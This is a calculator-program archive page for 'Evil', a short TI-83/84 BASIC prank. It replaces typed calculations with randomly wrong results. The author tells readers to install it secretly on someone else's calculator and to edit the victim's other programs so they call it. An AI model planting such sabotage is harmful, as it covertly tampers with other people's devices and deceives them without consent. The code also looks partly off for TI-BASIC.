Evil

You have not uploaded your program! Please edit the page to upload your program.

Author:

12Me21

Download: me22.pngNo Download Available
Version: 1
Compatibility: TI-83/84/+/SE
File Size: 64 Bytes
Genre: Arcade Graphics Platform Puzzle RPG Strategy Sports Casino Board Utility Misc
Rating:
TI|BD

Put this on someone else's calculator
When they try to do a math problem, if the answer would be an integer, it randomly changes it to another integer, and if the answer wouldn't be an integer, it changes it to a random number.
I would also suggest editing their other programs and changing "Stop" to whatever you named this program (if you want to be extra evil)
I actually did this to someone… I'm so mean.

Code: (download is useless because they might get suspicious if their calc. stopped working after you plugged it into your computer.)

While 1
Input "",θ
If θ=Int(θ
Then
Disp θ+RandInt(-θ,θ
Else
Disp θ+Rand(-θ,θ
End
End

What the community thinks:

Add a New Comment
Unless otherwise stated, the content of this page is licensed under Creative Commons Attribution-Noncommercial 2.5 License.